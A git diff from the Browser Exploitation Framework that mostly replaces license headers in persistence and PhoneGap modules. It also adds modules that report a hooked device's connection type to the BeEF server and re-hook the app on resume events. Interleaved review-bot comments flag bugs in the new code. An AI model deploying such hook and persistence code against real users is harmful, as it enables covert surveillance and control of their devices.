 beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Links have been rewritten to spawn an iFrame.');
 });
diff --git a/modules/persistence/iframe_above/config.yaml b/modules/persistence/iframe_above/config.yaml
index 7bff8e43b..cb2a75350 100644
--- a/modules/persistence/iframe_above/config.yaml
+++ b/modules/persistence/iframe_above/config.yaml
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/persistence/iframe_above/module.rb b/modules/persistence/iframe_above/module.rb index 053986199..59bb60847 100644 --- a/modules/persistence/iframe_above/module.rb +++ b/modules/persistence/iframe_above/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Iframe_above < BeEF::Core::Command 
diff --git a/modules/persistence/man_in_the_browser/command.js b/modules/persistence/man_in_the_browser/command.js index 148b64eb0..9e64a64e4 100644 --- a/modules/persistence/man_in_the_browser/command.js +++ b/modules/persistence/man_in_the_browser/command.js @@ -1,17 +1,8 @@ -// -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +/* + * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission + */ beef.execute(function() { try{ diff --git a/modules/persistence/man_in_the_browser/config.yaml b/modules/persistence/man_in_the_browser/config.yaml index 1f022ef1d..732b3e31f 100644 --- a/modules/persistence/man_in_the_browser/config.yaml +++ b/modules/persistence/man_in_the_browser/config.yaml 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/persistence/man_in_the_browser/module.rb b/modules/persistence/man_in_the_browser/module.rb index 75e8255c0..6035522ba 100644 --- a/modules/persistence/man_in_the_browser/module.rb +++ b/modules/persistence/man_in_the_browser/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Man_in_the_browser < BeEF::Core::Command 
diff --git a/modules/persistence/popunder_window/command.js b/modules/persistence/popunder_window/command.js index 92cc6b07b..dc89768e9 100644 --- a/modules/persistence/popunder_window/command.js +++ b/modules/persistence/popunder_window/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var result = "Pop-under window successfully created!"; diff --git a/modules/persistence/popunder_window/config.yaml b/modules/persistence/popunder_window/config.yaml index 8af49d40c..baed13237 100644 --- a/modules/persistence/popunder_window/config.yaml +++ b/modules/persistence/popunder_window/config.yaml 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/persistence/popunder_window/module.rb b/modules/persistence/popunder_window/module.rb index 850d1b6b6..c9612e35f 100644 --- a/modules/persistence/popunder_window/module.rb +++ b/modules/persistence/popunder_window/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Popunder_window < BeEF::Core::Command 
diff --git a/modules/phonegap/phonegap_beep/command.js b/modules/phonegap/phonegap_beep/command.js
index 1bf39ecce..91802774f 100644
--- a/modules/phonegap/phonegap_beep/command.js
+++ b/modules/phonegap/phonegap_beep/command.js
@@ -1,18 +1,9 @@
 //
-// Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-// Licensed under the Apache License, Version 2.0 (the "License");
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//
-// http://www.apache.org/licenses/LICENSE-2.0
-//
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an "AS IS" BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 // make the phone beep
 //
 beef.execute(function() {
diff --git a/modules/phonegap/phonegap_beep/config.yaml b/modules/phonegap/phonegap_beep/config.yaml
index c474553aa..ef5ce3c3c 100644
--- a/modules/phonegap/phonegap_beep/config.yaml
+++ b/modules/phonegap/phonegap_beep/config.yaml
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 # phonegap
 #
diff --git a/modules/phonegap/phonegap_beep/module.rb b/modules/phonegap/phonegap_beep/module.rb
index 013ae3b3c..9f7743d7e 100644
--- a/modules/phonegap/phonegap_beep/module.rb
+++ b/modules/phonegap/phonegap_beep/module.rb
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 # phonegap
 #
diff --git a/modules/phonegap/phonegap_check_connection/command.js b/modules/phonegap/phonegap_check_connection/command.js
new file mode 100644
index 000000000..c5791aff7
--- /dev/null
+++ b/modules/phonegap/phonegap_check_connection/command.js
@@ -0,0 +1,29 @@
+/*
+ * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+ * Browser Exploitation Framework (BeEF) - http://beefproject.com
+ * See the file 'doc/COPYING' for copying permission
+ */
+
+beef.execute(function() {
+ var connection_type;
+
+ getConnectionType = function() {
+ var states = {};
+ states[Connection.UNKNOWN] = 'Unknown connection';
+ states[Connection.ETHERNET] = 'Ethernet connection';
+ states[Connection.WIFI] = 'WiFi connection';
+ states[Connection.CELL_2G] = 'Cell 2G connection';
+ states[Connection.CELL_3G] = 'Cell 3G connection';
+ states[Connection.CELL_4G] = 'Cell 4G connection';
+ states[Connection.NONE] = 'No network connection';
+ return states[navigator.network.connection.type];
+ }
+
+ try {
+ connection_type = getConnectionType();
+ } catch(e) {
+ connection_type = "Unable to determine connection type."
+ }
+
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "connection_type="+connection_type);
+});
diff --git a/modules/phonegap/phonegap_check_connection/config.yaml b/modules/phonegap/phonegap_check_connection/config.yaml
new file mode 100644
index 000000000..a4734289e
--- /dev/null
+++ b/modules/phonegap/phonegap_check_connection/config.yaml
@@ -0,0 +1,17 @@
+#
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+# phonegap
+#
+beef:
+ module:
+ phonegap_check_connection:
+ enable: true
+ category: "Phonegap"
+ name: "Check connection"
+ description: "Find out connection type e.g. Wifi, 3G.."
+ authors: ["mh"]
+ target:
+ working: ["All"]
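Review bot: `getConnectionType = function() {` in phonegap_check_connection/command.js is assigned without `var`, so the function becomes a property of the page's global object and would throw a ReferenceError under strict mode; declare it locally with `var getConnectionType = function() {`. The payload is sent as `"connection_type="+connection_type`, while `post_execute` in this module's module.rb reads `@datastore['result']`, so the key names look mismatched and the saved value may be empty; sending `"result="+connection_type` or reading `@datastore['connection_type']` would line them up. The string assignment in the `catch` branch is also missing its terminating semicolon.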
diff --git a/modules/phonegap/phonegap_check_connection/module.rb b/modules/phonegap/phonegap_check_connection/module.rb new file mode 100644 index 000000000..12f2ab5d0 --- /dev/null +++ b/modules/phonegap/phonegap_check_connection/module.rb @@ -0,0 +1,17 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +# phonegap +# + +class Phonegap_check_connection < BeEF::Core::Command + + def post_execute + content = {} + content['result'] = @datastore['result'] + save content + end + +end diff --git a/modules/phonegap/phonegap_detect/command.js b/modules/phonegap/phonegap_detect/command.js index 1c0ae566b..63afc69fd 100644 --- a/modules/phonegap/phonegap_detect/command.js +++ b/modules/phonegap/phonegap_detect/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + // detect phonegap // beef.execute(function() { @@ -23,6 +14,7 @@ beef.execute(function() { phonegap_details = "" + " name: " + device.name + " phonegap api: " + device.phonegap + + " cordova api: " + device.cordova + " platform: " + device.platform + " uuid: " + device.uuid + " version: " + device.version; 
diff --git a/modules/phonegap/phonegap_detect/config.yaml b/modules/phonegap/phonegap_detect/config.yaml
index e1e55e846..c68722597 100644
--- a/modules/phonegap/phonegap_detect/config.yaml
+++ b/modules/phonegap/phonegap_detect/config.yaml
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 # phonegap
 #
diff --git a/modules/phonegap/phonegap_detect/module.rb b/modules/phonegap/phonegap_detect/module.rb
index 8242c79e8..dfb9c178e 100644
--- a/modules/phonegap/phonegap_detect/module.rb
+++ b/modules/phonegap/phonegap_detect/module.rb
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # phonegap # diff --git a/modules/phonegap/phonegap_file_upload/command.js b/modules/phonegap/phonegap_file_upload/command.js index c6b15e78e..fcf418b7b 100644 --- a/modules/phonegap/phonegap_file_upload/command.js +++ b/modules/phonegap/phonegap_file_upload/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + // phonegap_upload // beef.execute(function() { 
diff --git a/modules/phonegap/phonegap_file_upload/config.yaml b/modules/phonegap/phonegap_file_upload/config.yaml index f82d42fe8..f873bedd4 100644 --- a/modules/phonegap/phonegap_file_upload/config.yaml +++ b/modules/phonegap/phonegap_file_upload/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # phonegap # diff --git a/modules/phonegap/phonegap_file_upload/module.rb b/modules/phonegap/phonegap_file_upload/module.rb index 41b5f712f..3f058b4b5 100644 --- a/modules/phonegap/phonegap_file_upload/module.rb +++ b/modules/phonegap/phonegap_file_upload/module.rb 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # phonegap # diff --git a/modules/phonegap/phonegap_geo_locate/command.js b/modules/phonegap/phonegap_geo_locate/command.js index 15ea8fbf7..25d0d0095 100644 --- a/modules/phonegap/phonegap_geo_locate/command.js +++ b/modules/phonegap/phonegap_geo_locate/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + // geo locate // beef.execute(function() { 
diff --git a/modules/phonegap/phonegap_geo_locate/config.yaml b/modules/phonegap/phonegap_geo_locate/config.yaml index cb2a83894..af9f421a8 100644 --- a/modules/phonegap/phonegap_geo_locate/config.yaml +++ b/modules/phonegap/phonegap_geo_locate/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # phonegap # diff --git a/modules/phonegap/phonegap_geo_locate/module.rb b/modules/phonegap/phonegap_geo_locate/module.rb index 848d32e62..e66d6818e 100644 --- a/modules/phonegap/phonegap_geo_locate/module.rb +++ b/modules/phonegap/phonegap_geo_locate/module.rb 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # phonegap # diff --git a/modules/phonegap/phonegap_list_files/command.js b/modules/phonegap/phonegap_list_files/command.js index 14bdd0406..f9063a5bc 100644 --- a/modules/phonegap/phonegap_list_files/command.js +++ b/modules/phonegap/phonegap_list_files/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + // phonegap_upload // beef.execute(function() { 
diff --git a/modules/phonegap/phonegap_list_files/config.yaml b/modules/phonegap/phonegap_list_files/config.yaml index a4a20c709..8e46172c1 100644 --- a/modules/phonegap/phonegap_list_files/config.yaml +++ b/modules/phonegap/phonegap_list_files/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # phonegap # diff --git a/modules/phonegap/phonegap_list_files/module.rb b/modules/phonegap/phonegap_list_files/module.rb index 51cff073c..4d2d068a9 100644 --- a/modules/phonegap/phonegap_list_files/module.rb +++ b/modules/phonegap/phonegap_list_files/module.rb 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # phonegap # diff --git a/modules/phonegap/phonegap_persist_resume/command.js b/modules/phonegap/phonegap_persist_resume/command.js new file mode 100644 index 000000000..65df0464d --- /dev/null +++ b/modules/phonegap/phonegap_persist_resume/command.js @@ -0,0 +1,22 @@ +/* + * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission + */ + +// +// persist on over app's sleep/wake events +beef.execute(function() { + var result; + + try { + document.addEventListener("resume", beef_init(), false); + result = 'success'; + + } catch (e) { + for(var n in e) { + result+= n + " " + e[n] + "\n"; + } + } + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+result); +}); diff --git a/modules/phonegap/phonegap_persist_resume/config.yaml b/modules/phonegap/phonegap_persist_resume/config.yaml new file mode 100644 index 000000000..0248549c6 --- /dev/null +++ b/modules/phonegap/phonegap_persist_resume/config.yaml 
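Review bot: In the new phonegap_persist_resume/command.js, `var result;` is declared without a value, so in the `catch` branch `result += n + " " + e[n] + "\n"` starts from `undefined` and the reported string begins with the literal text "undefined". Initialise it with `var result = '';`. The `for (var n in e)` loop may also enumerate nothing, since the properties of error objects are non-enumerable in many engines, leaving no usable error text; `result = String(e);` would record the failure more reliably. The value is then concatenated unencoded into `'result=' + result`, so wrapping it in `encodeURIComponent(result)` would keep newlines and `&` from corrupting the parameter, assuming `beef.net.send` does not already encode it.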
@@ -0,0 +1,17 @@
+#
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+
+# persist on over app's sleep/wake events
+beef:
+ module:
+ phonegap_persist_resume:
+ enable: true
+ category: "Phonegap"
+ name: "Persist resume"
+ description: "Persist over applications sleep/wake events"
+ authors: ["mh"]
+ target:
+ working: ["All"]
diff --git a/modules/phonegap/phonegap_persist_resume/module.rb b/modules/phonegap/phonegap_persist_resume/module.rb
new file mode 100644
index 000000000..f324866f7
--- /dev/null
+++ b/modules/phonegap/phonegap_persist_resume/module.rb
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+
+# persist on over app's sleep/wake events
+class Phonegap_persist_resume < BeEF::Core::Command
+
+ def post_execute
+ content = {}
+ content['result'] = @datastore['result']
+ save content
+ end
+
+end
diff --git a/modules/phonegap/phonegap_persistence/command.js b/modules/phonegap/phonegap_persistence/command.js
index 7944fa756..60936c0fb 100644
--- a/modules/phonegap/phonegap_persistence/command.js
+++ b/modules/phonegap/phonegap_persistence/command.js
@@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + // persistence // beef.execute(function() { diff --git a/modules/phonegap/phonegap_persistence/config.yaml b/modules/phonegap/phonegap_persistence/config.yaml index 7d449e7c9..f8f6a3201 100644 --- a/modules/phonegap/phonegap_persistence/config.yaml +++ b/modules/phonegap/phonegap_persistence/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # phonegap persistence # 
diff --git a/modules/phonegap/phonegap_persistence/module.rb b/modules/phonegap/phonegap_persistence/module.rb index 30face23d..35c565aeb 100644 --- a/modules/phonegap/phonegap_persistence/module.rb +++ b/modules/phonegap/phonegap_persistence/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # phonegap persistenece # diff --git a/modules/phonegap/phonegap_start_record_audio/command.js b/modules/phonegap/phonegap_start_record_audio/command.js index 503fc606d..35619852c 100644 --- a/modules/phonegap/phonegap_start_record_audio/command.js +++ b/modules/phonegap/phonegap_start_record_audio/command.js 
